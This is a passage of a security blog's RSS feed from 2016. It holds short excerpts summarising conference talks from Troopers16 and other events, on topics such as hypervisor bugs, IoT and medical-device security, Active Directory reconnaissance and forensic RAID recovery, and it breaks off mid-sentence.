      <pubDate>Fri, 15 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/infiltrate-and-syscan-360/</guid>
      <description>&lt;p&gt;Hi everyone,&lt;/p&gt;&#xA;&lt;p&gt;I spent the last weeks traveling to Singapore and Miami to present my &lt;em&gt;Xenpwn&lt;/em&gt; research about double fetch vulnerabilities in paravirtualized devices at Infiltrate and Syscan360. You can find my slides &lt;a href=&#34;https://www.ernw.de/download/xenpwn.pdf&#34;&gt;here&lt;/a&gt;. Both conferences had great organization, very technical talks and a cool audience. In the following I want to give a short recap of some of the talks I liked the most:&lt;/p&gt;&#xA;&lt;h2 id=&#34;sean-heelan-automatic-root-cause-identification-for-crashing-executions-infiltrate&#34;&gt;Sean Heelan – Automatic Root-Cause Identification for Crashing Executions (Infiltrate)&lt;/h2&gt;&#xA;&lt;p&gt;Sean Heelan talked about his work on automated root cause analysis. The goal of this research is to give a human researcher a detailed analysis of the potential root causes (in the form of violated predicates) that triggered a crash during a fuzzing run. Sean summarizes the core idea of his research much better than I would be able to in his &lt;a href=&#34;https://sean.heelan.ie/2016/04/13/some-early-stage-work-on-statistical-crash-triage/&#34;&gt;blog post&lt;/a&gt;, which also contains a link to his slides. I’m always a big fan of his talks because he is one of the few peoples working in the intersection between the academic program verification community and the IT security industry.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Discover the Unknown: Analyzing an IoT Device</title>
      <link>https://insinuator.net/2016/04/discover-the-unknown-analyzing-an-iot-device/</link>
      <pubDate>Mon, 11 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/discover-the-unknown-analyzing-an-iot-device/</guid>
      <description>&lt;p&gt;This blog post will give a brief overview about how a simple IoT device can be assessed. It will show a basic methodology, what tools can be used for different tasks and how to solve problems that may arise during analyses. It is aimed at readers that are interested in how such a device can be assessed, those with general interest in reverse engineering or the ones who just want to see how to technically approach an unknown device.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Summary GI Sicherheit</title>
      <link>https://insinuator.net/2016/04/summary-gi-sicherheit/</link>
      <pubDate>Fri, 08 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/summary-gi-sicherheit/</guid>
      <description>&lt;p&gt;This is a short summary of selected talks (i.e. those that I found the most interesting of those I was able to personally attend) of the &lt;em&gt;&lt;a href=&#34;https://sicherheit2016.de/&#34;&gt;GI Sicherheit 2016&lt;/a&gt;&lt;/em&gt;.&lt;/p&gt;&#xA;&lt;p&gt;First of all, congratulations to Dr. Fabian Yamaguchi, who received an award (the &lt;em&gt;GI Promotionspreis&lt;/em&gt;) for his PhD thesis “&lt;a href=&#34;https://ediss.uni-goettingen.de/bitstream/handle/11858/00-1735-0000-0023-9682-0/mainFastWeb.pdf&#34;&gt;Pattern-Based Vulnerability Discovery&lt;/a&gt;“!&lt;br&gt;&#xA;His work presents an “approach for identifying vulnerabilities which combines techniques from static analysis, machine learning, and graph mining to augment the analyst’s abilities rather than trying to replace her” by identifying and highlighting patterns of potential vulnerabilities in source code.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TSD 2016 – Follow Up</title>
      <link>https://insinuator.net/2016/04/tsd-2016-follow-up/</link>
      <pubDate>Thu, 07 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/tsd-2016-follow-up/</guid>
      <description>&lt;p&gt;Thanks again for all the great talks and fruitful discussions &lt;a href=&#34;https://www.troopers.de/events/troopers16/580_telcosecday_2016_invitation_only/&#34;&gt;@TSD 2016&lt;/a&gt;! I hope everybody had a safe trip home and enjoyed Troopers as we did. In the meantime I contacted all speakers to talk about publication of their slidesets. Some of them agreed (or already published them on their own) so I’d like to share these with you:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/TSD2016_Assaulting_diameter_IPX_network.pdf&#34;&gt;&lt;strong&gt;Alexandre De Oliveira&lt;/strong&gt; – &lt;em&gt;Assaulting IPX Diameter roaming network&lt;/em&gt;&lt;/a&gt;&lt;a href=&#34;https://www.ernw.de/download/TSD2016_Known_Unknowns_of_SS7.pdf&#34;&gt;&lt;br&gt;&#xA;&lt;strong&gt;Siddharth Rao&lt;/strong&gt; – &lt;em&gt;The known unknowns of SS7 and beyond.&lt;/em&gt;&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;https://www.ernw.de/download/TSD2016_rucki_zucki.pdf&#34;&gt;&lt;strong&gt;Joao Collier de Mendonca&lt;/strong&gt; – &lt;em&gt;“rucki zucki” scanning tool&lt;/em&gt;&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;http://git.gnumonks.org/index.html/laforge-slides/plain/2016/telcosecday/foss-gsm.html&#34;&gt;&lt;strong&gt;Harald Welte&lt;/strong&gt; – &lt;em&gt;Open Source Network Elements for Security Analysis of Mobile Networks&lt;/em&gt;&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;https://www.ernw.de/download/TSD2016_Ravi-Altaf.pdf&#34;&gt;&lt;strong&gt;Ravi &amp;amp; Altaf Shaik&lt;/strong&gt; – &lt;em&gt;Don’t connect to my 4G base station: investigating info leaks in 4G basebands&lt;/em&gt;&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Unpatchable – Living with a vulnerable implanted device</title>
      <link>https://insinuator.net/2016/04/unpatchable-living-with-a-vulnerable-implanted-device/</link>
      <pubDate>Thu, 07 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/unpatchable-living-with-a-vulnerable-implanted-device/</guid>
      <description>&lt;p&gt;TL;DR: Marie Moe talked about security issues of medical devices, especially implantable devices like pacemakers, but not in overwhelming technological depth. She wanted to point out the necessity of intensified security research in the field of medical devices as vendors and medical personnel seem to be lacking necessary awareness of security of devices, interfaces, services, and even data privacy.”Get involved, &lt;a href=&#34;https://www.iamthecavalry.org/&#34;&gt;join the cavalry&lt;/a&gt;” was her core message.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Lub-Dub-Lub-Dub-Lub-Dub&lt;/strong&gt;&lt;br&gt;&#xA;Marie started her talk with the sound of a repeating heartbeat. First she introduced how she came up with the topic of her talk: Marie relies on a pacemaker herself andsince she got it implanted she was curious how secure this little device might be. A minimum education of the auditorium followed including an explanation how a human heart works and what a pacemaker does.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Assessment of Microsoft DirectAccess</title>
      <link>https://insinuator.net/2016/04/security-assessment-of-microsoft-directaccess/</link>
      <pubDate>Wed, 06 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/security-assessment-of-microsoft-directaccess/</guid>
      <description>&lt;p&gt;A &lt;a href=&#34;https://www.troopers.de/events/ipv6-security-summit-2016/698_security_assessment_of_microsoft_directaccess/&#34;&gt;talk&lt;/a&gt; about DirectAccess (an IPv6-only VPN solution) was given by our colleague Ali Hardudi during IPv6 summit. Ali has recently finished his master thesis on this topic.&lt;/p&gt;&#xA;&lt;p&gt;The DirectAccess VPN technology was introduced by Microsoft starting from Windows server 2008. It allows users remotely, seamlessly and securely connect to their internal network resources without a need to provide user credentials, which is done using different technologies such as Windows domain group policies.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Anonymization IPv6 in PCAPs – Challenges and Wins</title>
      <link>https://insinuator.net/2016/04/anonymization-ipv6-in-pcaps-challenges-and-wins/</link>
      <pubDate>Tue, 05 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/anonymization-ipv6-in-pcaps-challenges-and-wins/</guid>
      <description>&lt;p&gt;Jasper Bongertz is a Senior Technical Consultant at Airbus Defence and Space CyberSecurity. He is focusing on IT security, Incident Response and Network Forensics.&lt;br&gt;&#xA;During the IPv6 summit on Troopers16 he had given a &lt;a href=&#34;https://www.troopers.de/events/ipv6-security-summit-2016/693_anonymization_ipv6_in_pcaps_-_challenges_and_wins/&#34;&gt;talk&lt;/a&gt; on anonymization IPv6 in PCAPs and presented his new tool.&lt;/p&gt;&#xA;&lt;p&gt;Sometimes you need to share your packet capture files (PCAPs), but distributing them involves a risk of exposing the confidential information. To avoid this, you must sanitize your PCAPs. The goal of sanitization is to remove the critical details but keep enough information for the PCAP to still be useful. The original-to-sanitized ratio is based on your goals.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Passive Intelligence Gathering and Analytics – It’s all Just Metadata!</title>
      <link>https://insinuator.net/2016/04/passive-intelligence-gathering-and-analytics-its-all-just-metadata/</link>
      <pubDate>Tue, 05 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/passive-intelligence-gathering-and-analytics-its-all-just-metadata/</guid>
      <description>&lt;p&gt;The first talk after the keynote on day 2 of TROOPERS was from Christopher Truncer about passive intelligence gathering and the analytics of that. Christopher Truncer (@ChrisTruncer) is a red teamer with Mandiant. He is a co-founder and current developer of the Veil-Framework, a project aimed to bridge the gap between advanced red team and penetration testing toolsets.&lt;/p&gt;&#xA;&lt;p&gt;His talk is mainly about defending a network from different threats by collecting and analyzing metadata from different sources.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Kings in your Castle</title>
      <link>https://insinuator.net/2016/04/the-kings-in-your-castle/</link>
      <pubDate>Tue, 05 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/the-kings-in-your-castle/</guid>
      <description>&lt;p&gt;At the second day of the TROOPERS16 conference an interesting talk about Advanced Persistent Threats took place from Marion Marschalek and Raphaël Vinot. Marion Marschalek is a Security Researcher, focusing on the analysis of emerging threats and exploring novel methods of threat detection. Marion started her career within the anti-virus industry and also worked on advanced threat protection systems where she built a thorough understanding of how threats and protection systems work and how both occasionally fail.&lt;/p&gt;</description>
    </item>
    <item>
      <title>draft-vyncke-pim-mld-security</title>
      <link>https://insinuator.net/2016/04/draft-vyncke-pim-mld-security/</link>
      <pubDate>Mon, 04 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/draft-vyncke-pim-mld-security/</guid>
      <description>&lt;p&gt;Right now, I’m in Buenos Aires for IETF95 where, amongst others, an Internet-Draft authored by &lt;a href=&#34;http://www.ciscopress.com/authors/bio/51D11BF7-F351-4ED9-995E-E0F5CB6C009D&#34;&gt;Eric Vyncke&lt;/a&gt;, &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt; and myself will be presented (and hopefully discussed) in two working groups. In the following I want to quickly lay out why we think this is an important contribution.&lt;/p&gt;&#xA;&lt;p&gt;As some of you may remember about two years ago we started an internal research project on the IPv6 “helper procotol” &lt;em&gt;Multicast Listener Discovery&lt;/em&gt; (MLD) and its security properties. One outcome of this research project was &lt;a href=&#34;https://twitter.com/anantary&#34;&gt;Jayson Salazar&lt;/a&gt;‘s excellent thesis on the topic (the full document &lt;a href=&#34;https://www.its.fh-muenster.de/doc/Security_Implications_of_MLD_in_IPv6_Networks.pdf&#34;&gt;can be found here&lt;/a&gt;), another outcome were the related talks we gave at DeepSec 2014 and at &lt;a href=&#34;https://www.troopers.de/media/filer_public/7c/35/7c35967a-d0d4-46fb-8a3b-4c16df37ce59/troopers15_ipv6secsummit_atlasis_rey_salazar_mld_considered_harmful_final.pdf&#34;&gt;Troopers15&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Advanced IPv6 Network Reconnaissance</title>
      <link>https://insinuator.net/2016/04/advanced-ipv6-network-reconnaissance/</link>
      <pubDate>Sun, 03 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/advanced-ipv6-network-reconnaissance/</guid>
      <description>&lt;p&gt;Fernando Gont, who is specializing in the field of communications protocols security, gave a &lt;a href=&#34;https://www.troopers.de/events/ipv6-security-summit-2016/594_advanced_ipv6_network_reconnaissance/&#34;&gt;talk&lt;/a&gt; during this year’s Troopers IPv6 summit. He spoke about network reconnaissance techniques in IPv6 area and presented a brand new set of tools for this purpose.&lt;/p&gt;&#xA;&lt;p&gt;Comparing with methods for IPv4, reconnaissance techniques for IPv6 should be different. It offers much larger address space, so such attacks as brute force address scanning are not feasible anymore, because it would take too much time to send one packet to each and every possible address. Fernando has also noted that in general network reconnaissance support in security tools has traditionally been poor. Together these facts prompt that it’s time for something new, and recently a new &lt;a href=&#34;https://tools.ietf.org/html/rfc7707&#34;&gt;IETF RFC 7707&lt;/a&gt; was published.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Patch Me If You Can</title>
      <link>https://insinuator.net/2016/04/patch-me-if-you-can/</link>
      <pubDate>Sat, 02 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/patch-me-if-you-can/</guid>
      <description>&lt;p&gt;Right after the Opening Keynote of TROOPERS16, an informative and interesting talk took place at the SAP Security track. This talk was given by three speakers; Damian Poddebniak who is currently a master student at the University of Applied Sciences of Münster, Sebastian Schinzel who works as an IT security Professor at the University of Applied Sciences of Münster and he is also the founder of CycleSEC GmbH and finally the sixth-time speaker at Troopers “Andreas Wiegenstein” who is the CTO of Virtual Forge GmbH and a professional SAP security consultant since 2003.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Tools for Troubleshooting and Monitoring IPv6 Networks</title>
      <link>https://insinuator.net/2016/04/tools-for-troubleshooting-and-monitoring-ipv6-networks/</link>
      <pubDate>Sat, 02 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/tools-for-troubleshooting-and-monitoring-ipv6-networks/</guid>
      <description>&lt;p&gt;Yet another interesting 180-minute workshop in IPv6 Security Summit of TROOPERS16, which aimed to introduce the IPv6 troubleshooting and monitoring tools, which are essentially needed by users in order to know how to deal with IPv6 in any IPv6-enabled network.&lt;/p&gt;&#xA;&lt;p&gt;Before we dive into this post, let me introduce you in few words “Gabriel Müller” the speaker and the instructor of this workshop. Gabriel works as a senior consultant at AWK Group by mainly assisting clients in the public and private sectors as a project manager and an expert in the network area.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Building a secure and reliable IPv6 Guest Wi-Fi Network by Christopher Werny</title>
      <link>https://insinuator.net/2016/04/building-a-secure-and-reliable-ipv6-guest-wi-fi-network-by-christopher-werny/</link>
      <pubDate>Fri, 01 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/building-a-secure-and-reliable-ipv6-guest-wi-fi-network-by-christopher-werny/</guid>
      <description>&lt;p&gt;Christopher Werny leads the network security team for ERNW and since 2005 he is involved in numerous IPv6 projects where he is responsible for planning, implementation and troubleshooting existing projects.&lt;/p&gt;&#xA;&lt;p&gt;The first topic he approached was “How to build a conference WLAN Network in General”. The very first suggestion was to put it to the 5GHz channel because there could be a lot of interferences in the 2.4 GHz channel. The basic idea here is to disable 802.11b completely if it´s possible in your environment and no-one is using it anyway. Further you should also consider nearby Wi-Fi signals and on which channels they reside. His next recommendation was about setting the inactivity timer to short intervals, this will avoid unnecessary resource spending from the APs when they try to track down moved or shut down devices. His last general recommendation from him was regarding a central DHCP Server. This will enable the roaming from mobile devices without getting a new IP-Address when bridged mode is enabled for the APs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Caring for file formats</title>
      <link>https://insinuator.net/2016/04/caring-for-file-formats/</link>
      <pubDate>Fri, 01 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/caring-for-file-formats/</guid>
      <description>&lt;p&gt;Ange Albertini is a reverse engineer and author of Corkami.&lt;/p&gt;&#xA;&lt;p&gt;First and foremost he explained what a polyglot file is. A polyglot is a special file that has more than one type in the same file. For example, Ange Albertini demonstrated a polyglot which is a pdf, a pdf reader, a java executable and an html file inside of one file. The second polyglot he demonstrated was a file which had the characteristics that when you encrypted it with AES you get a PNG image and if it´s encrypted with another key you will get a flash video and when you encrypted it with DES you get a PDF document. He pointed out that a file format is not just a sequence of byte it´s rather a computer dialect to communicate between communities. He also highlighted that people don’t really care about what is behind the file format they only what to use it and communicate with other people.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Imma Chargin Mah Lazer-How to protect against (D)DoS attacks</title>
      <link>https://insinuator.net/2016/04/imma-chargin-mah-lazer-how-to-protect-against-ddos-attacks/</link>
      <pubDate>Fri, 01 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/imma-chargin-mah-lazer-how-to-protect-against-ddos-attacks/</guid>
      <description>&lt;p&gt;Denial of Service (DoS) attacks aim to make services and systems unavailable to legitimate users . If these attacks are performed by multiple sources at the same time and for the same target, they are called Distributed Denial of Service (DDoS) attacks. This talk “Imma Chargin Mah Lazer” describes different types of (D)DoS attacks that are out in the wild and are seen on a daily basis by different corporations. Furthermore,  a multi-layered strategy to mitigate such kinds of attacks has been presented within the talk. The speaker is Dr. Oliver Matula, an IT security researcher at ERNW who holds a PHD degree in physics. He presented the topic in a simple way which eases the delivery of information to audience of different technical levels and backgrounds.&lt;/p&gt;</description>
    </item>
    <item>
      <title>QNX: 99 Problems but a Microkernel ain’t one!</title>
      <link>https://insinuator.net/2016/04/qnx-99-problems-but-a-microkernel-aint-one/</link>
      <pubDate>Fri, 01 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/qnx-99-problems-but-a-microkernel-aint-one/</guid>
      <description>&lt;p&gt;The talk “QNX: 99 Problems but a Microkernel ain’t one!” was part of the Troopers conference in Heidelberg, 16 March 2016. The talk was done by the researchers Alex Plaskett and Georgi Geshev from the MWR Labs. The MWR Labs is the research department of the cyber security consultancy MWR InfoSecurity located in the UK.&lt;br&gt;&#xA; &lt;br&gt;&#xA;The talk provided an overview of the research on the architecture and security systems of the QNX kernel with focus on the Blackberry 10 operating system. The talk was divided into two parts. First Alex Plaskett gave an introduction regarding the general structure of the QNX operation system and introduced the main subsystems. Second Georgi Geshev presented tools and approaches to abuse vulnerabilities in the QNX system.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The road to secure Smart Cars: ENISA approach</title>
      <link>https://insinuator.net/2016/04/the-road-to-secure-smart-cars-enisa-approach/</link>
      <pubDate>Fri, 01 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/the-road-to-secure-smart-cars-enisa-approach/</guid>
      <description>&lt;p&gt;At TROOPERS16, Dr. Cédric LÉVY-BENCHETON an expert in cyber security at ENISA, the European Union Agency for Network and Information Security. Dr. Cédric LÉVY-BENCHETON  holds a presentation about cyber security of IoT (Internet of Things) and smart cars he presents the current threats in IoT and Smart cars. ENISA is an agency of the European Union. ENISA assists the Commission, the Member States and, the business community in meeting the requirements of network and information security.&lt;/p&gt;</description>
    </item>
    <item>
      <title>unrubby: reversing without reversing</title>
      <link>https://insinuator.net/2016/04/unrubby-reversing-without-reversing/</link>
      <pubDate>Fri, 01 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/unrubby-reversing-without-reversing/</guid>
      <description>&lt;p&gt;The talk “unrubby: reversing without reversing” was part of the Troopers conference in Heidelberg, 16 March 2016. The talk was done by Richo Healey, who is currently working on the security engineering team at the Irish payment company Stripe. Richo Healey is an experienced conference speaker. Amongst other he has spoken at Kiwicon, DEF CON and 44con.&lt;br&gt;&#xA; &lt;br&gt;&#xA;In his talk Richo Healey spoke about reverse engineering of Ruby software. First he talked about existing tools and techniques to regenerate source code from Ruby bytecode. Then he presented a new concept, which is implemented in his tool “unrubby”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BMC BladeLogic: CVE-2016-1542 and CVE-2016-1543</title>
      <link>https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/</guid>
      <description>&lt;p&gt;Hi everyone,&lt;/p&gt;&#xA;&lt;p&gt;Hope those of you who attended Troopers16 enjoyed it as much as we did! In this post I want to summarize my &lt;a href=&#34;https://www.troopers.de/events/troopers16/648_one_tool_to_rule_them_all_-_and_what_can_it_lead_to/&#34;&gt;Troopers16 talk&lt;/a&gt; and provide you with some details about freshly assigned CVE-2016-1542 and CVE-2016-1543 related to BMC BladeLogic software.&lt;/p&gt;&#xA;&lt;p&gt;To start with, BMC Software Inc. is an American company specializing in business service management software; they develop software used for multiple functions, including IT service management, data center automation, performance management, virtualization lifecycle management and cloud computing management. Among other products they have developed a BladeLogic suite that includes Database Automation, Middleware Automation, Server Automation, and Network Automation tools. The one under our focus was BladeLogic Server Automation (BSA).&lt;/p&gt;</description>
    </item>
    <item>
      <title>DFRWS EU 2016 Summary</title>
      <link>https://insinuator.net/2016/03/dfrws-eu-2016-summary/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/dfrws-eu-2016-summary/</guid>
      <description>&lt;p&gt;In this article, I want to provide a concise sum-up of the (to me) most interesting talks of this year’s DFRWS EU (&lt;a href=&#34;http://www.dfrws.org/2016eu/&#34;&gt;http://www.dfrws.org/2016eu/&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;Eoghan Casey, one of most famous pioneers in digital forensics, and David-Olivier Jaquet-Chiffelle, professor in police science at University of Lausanne, gave a keynote that emphasized the need for theoretical fundamental basis research in the field of digital forensics, which I fully agreed on, as this was exactly what I addressed in some of my former research.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How easy to grow robust botnet with low hanging fruits (IoT) – for free</title>
      <link>https://insinuator.net/2016/03/how-easy-to-grow-robust-botnet-with-low-hanging-fruits-iot-for-free/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/how-easy-to-grow-robust-botnet-with-low-hanging-fruits-iot-for-free/</guid>
      <description>&lt;p&gt;Attila Marosi works as a Senior Threat Research at Sophos Labs in Hungary. His talk focused on vulnerable IoT devices that are exposed to the internet. His approach was to look for vulnerable devices with low cost tools and publicly available data.&lt;/p&gt;&#xA;&lt;p&gt;He started his talk with the spoiler that he is not going to reveal any new attacks nor new techniques. But newer data are more adequate and we can see the current state of vulnerable devices connected to the internet. This means his approach was to test the state of IoT devices like Routers, NAS and so on with publicly available data.&lt;/p&gt;</description>
    </item>
    <item>
      <title>I Have the Power(View): Offensive Active Directory with PowerShell</title>
      <link>https://insinuator.net/2016/03/i-have-the-powerview-offensive-active-directory-with-powershell/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/i-have-the-powerview-offensive-active-directory-with-powershell/</guid>
      <description>&lt;p&gt;In his talk &lt;a href=&#34;https://www.troopers.de/events/troopers16/604_i_have_the_powerview_offensive_active_directory_with_powershell/&#34;&gt;I have the Power(View): Offensive Active Directory with PowerShell&lt;/a&gt; Will Schroeder, a researcher and Red teamer in Veris Group´s Adaptive Thread Division, presented offensive Active Directory information gathering technics using his Tool PowerView.&lt;/p&gt;&#xA;&lt;p&gt;PowerView does not use the built in AD cmdlets to be independent from the Remote Server Administration Tools (RSAT)-AD PowerShell Module which is only compatible with PowerShell 3.0+ and by default only installed on servers that have Active Directory services roles. PowerView, however, is compatible with PowerShell 2.0 and has no outer dependencies. Furthermore, it does not require any installation process.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Keynote #1 Troopers 2016</title>
      <link>https://insinuator.net/2016/03/keynote-%231-troopers-2016/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/keynote-%231-troopers-2016/</guid>
      <description>&lt;p&gt;The first Keynote directly after the Opening by Enno Rey was held by Ben Zevenbergen. At the beginning he pointed out that he is not a very technical guy rather he specialized in Information Law and a policy advisor to the European Parliament. Before he started to dive into his Keynote he talked about some rant story’s which happened to him while trying to make his point clear on previous conferences and that he came in peace to Troopers ;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Mind The Gap – Exploit Free Whitelisting Evasion Tactics</title>
      <link>https://insinuator.net/2016/03/mind-the-gap-exploit-free-whitelisting-evasion-tactics/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/mind-the-gap-exploit-free-whitelisting-evasion-tactics/</guid>
      <description>&lt;p&gt;At the Troopers 16 Casey Smith has given a talk about the gap in Application Whitelisting.&lt;/p&gt;&#xA;&lt;p&gt;Application Whitelisting is a technique that should prevent malware and unauthorized applications from running. Broadly speaking this is implemented by deciding if an application is trusted or not before executing it. Casey’s talk gave an understanding where this whitelisiting fails down.&lt;/p&gt;&#xA;&lt;p&gt;In his introduction about the architecture he reminded us: There is no perfect defense. It is important to understand how the defenses work and where they fail. In the difference to exploits, which can be patched, there is no possibility to patch architecture flaws.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reverse Engineering a Digital Two-Way Radio</title>
      <link>https://insinuator.net/2016/03/reverse-engineering-a-digital-two-way-radio/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/reverse-engineering-a-digital-two-way-radio/</guid>
      <description>&lt;p&gt;In their talk “&lt;a href=&#34;https://www.troopers.de/events/troopers16/620_reverse_engineering_a_digital_two-way_radio/&#34;&gt;Reverse Engineering a Digital Two Way Radio&lt;/a&gt;” Travis Goodspeed and Christiane Ruetten presented the challenges they faced and overcame while reverse engineering “Tytera MD380”, a handheld transceiver for the Digital Mobile Radio (DMR) protocol.&lt;/p&gt;&#xA;&lt;p&gt;“Tytera MD380” is based around two chips: STM32F405 CPU with an ARM Cortex M4F core and Readout Device Protection and a HRC5000 baseband processor which implements the actual digital radio. While STM32F405 is fully documented, there is no documentation for HRC5000 publicly available but with the help of the Chinese community they were able to obtain the Chinese documentation.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Towards a LangSec-aware SDLC</title>
      <link>https://insinuator.net/2016/03/towards-a-langsec-aware-sdlc/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/towards-a-langsec-aware-sdlc/</guid>
      <description>&lt;p&gt;At the TROOPERS’15 Jacob l. Torrey held a track about LangSec-Aware Software Development Lifecycle. He talked about programming conventions and what tools can be used for enforcing the compliance. There is a lack of metrics to understand what make software more secure or less secure. His main goals was to show that LangSec has far-reaching impacts into software security and to give the audience a framework to transform the theory into practice. A SLDC should help to find bugs sooner in the development process and reduce defect rate in production thereby. A lower defect rate in production does not only improve security it also reduces costs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers Netmon</title>
      <link>https://insinuator.net/2016/03/troopers-netmon/</link>
      <pubDate>Thu, 31 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/troopers-netmon/</guid>
      <description>&lt;p&gt;Hi everybody,&lt;/p&gt;&#xA;&lt;p&gt;Christopher talked already about our WiFi Network during the &lt;a href=&#34;https://www.troopers.de/events/ipv6-security-summit-2016/672_building_a_reliable_and_secure_ipv6_wifi_network/&#34;&gt;IPv6 Security Summit&lt;/a&gt; and mentioned our monitoring system (we like to call “netmon”). As there were quite some people interested in the detailed setup and configuration, we would like to share the details with you. This year we used a widely known frontend called Grafana and as backend components InfluxDB and collectd. During Troopers the monitoring system was public reachable over IPv6 and provided statistics about Uplink Bandwidth, IP Protocol Distribution, Clients and Wireless Bands.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Generic RAID Reassembly using Block-Level Entropy</title>
      <link>https://insinuator.net/2016/03/generic-raid-reassembly-using-block-level-entropy/</link>
      <pubDate>Wed, 30 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/generic-raid-reassembly-using-block-level-entropy/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/03/FullSizeRender-209x300.jpg&#34; alt=&#34;DFRWS EU 2016 Talk Forensic Raid Recovery&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;DFRWS EU 2016 Talk Forensic Raid Recovery&lt;/p&gt;&#xA;&lt;p&gt;We just presented our Paper “&lt;em&gt;Generic RAID Reassembly using Block-Level Entropy&lt;/em&gt;” at the &lt;em&gt;DFRWS EU 2016&lt;/em&gt; digital forensics conference (&lt;a href=&#34;http://www.dfrws.org/&#34;&gt;http://www.dfrws.org/&lt;/a&gt;). The article is about a new approach that we developed for forensic RAID recovery. Our technique calculates block-wise entropy all over the disks and uses generic heuristics on those to detect all the relevant RAID parameters such as stripe size, stripe map, disk order, and RAID type, that are needed to reassemble the RAID and make the data accessible again for forensic investigations (or just for data recovery).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Medical Device Security: Hack or Hype</title>
      <link>https://insinuator.net/2016/03/medical-device-security-hack-or-hype/</link>
      <pubDate>Wed, 30 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/medical-device-security-hack-or-hype/</guid>
      <description>&lt;p&gt;Kevin Fu is an Associate Professor at the University of Michigan where he directs the Archimedes Center for Medical Device Security and cofounded Virta Labs. At Troopers 16 he held a talk in the field of his research: &lt;a href=&#34;https://www.troopers.de/events/troopers16/697_medical_device_security_hack_or_hype/&#34;&gt;medical device security&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;He started his talk with a brief introduction how he got started with medical device security and how it has changed since he started. Round about ten years ago he started dumpster diving for medical devices to investigate how they are protected and maintained. In 2006 he held his first talk about medical device security at the FDA. In 2008 he presented a wireless replay attack against a pacemaker. In 2013 concerns about medical device security became more and more mainstream when the television series homeland featured an episode where the pacemaker of the American vice president was attacked resulting in his death. Now, instead of dumpster diving for medical devices, he works together with clinicians and 